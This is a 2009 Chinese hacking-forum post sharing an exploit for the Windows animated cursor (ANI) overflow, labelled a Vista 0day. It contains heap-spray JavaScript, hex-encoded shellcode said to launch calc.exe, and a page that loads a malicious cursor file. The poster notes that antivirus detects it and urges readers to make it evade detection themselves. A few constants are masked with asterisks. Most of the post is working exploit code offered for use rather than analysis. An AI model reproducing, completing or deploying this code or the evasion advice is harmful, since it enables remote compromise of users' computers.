找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 730|回复: 0

Vista 光标远程溢出(oday)

[复制链接]

31

主题

154

回帖

256

牛毛

一级牛人

积分
256
发表于 2009-4-6 12:17:43 | 显示全部楼层 |阅读模式 来自 山东省滨州市
Vista 光标远程溢出(oday)
被查杀了,大家自己做下免杀吧。

::[ geqian presents ]::..

Windows Animated Cursor Handling Exploit (0day)

Works on fully patched Windows Vista
I think it is first real remote code execution exploit on vista =)

Tested on:
Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
Windows XP SP2
(It also must to work on all nt based windows but not tested)

Author: geqian
Mail: 70527418@vip.qq.com

Bug discovered by determina (http://www.aground.cn/)

Credit: geqian, http://www.aground.cn/

invokes calc.exe if successful

-->

<SCRIPT language="javascript">
var heapSprayToAddress = 0x070****0000;

var payLoadCode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B
%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424
%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031
%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B
%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var heapBlockSize = 0x40***00;

var payLoadSize = payLoadCode.length * 2;

var spraySlideSize = heapBlockSize - (payLoadSize+0x38);

var spraySlide = unescape("%u4141%u4141");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);

heapBlocks = (heapSprayToAddress - 0x40***00)/heapBlockSize;

memory = new Array();

for (i=0;i<heapBlocks;i++)
{
memory = spraySlide + payLoadCode;
}

document.write("<HTML><BODY style=\"CURSOR: url($1$riff.htm$1$)\"> </BODY></HTML>")
wait(500)
window.location.reload()

function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
</SCRIPT>
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-29 03:32 , Processed in 0.203985 second(s), 34 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表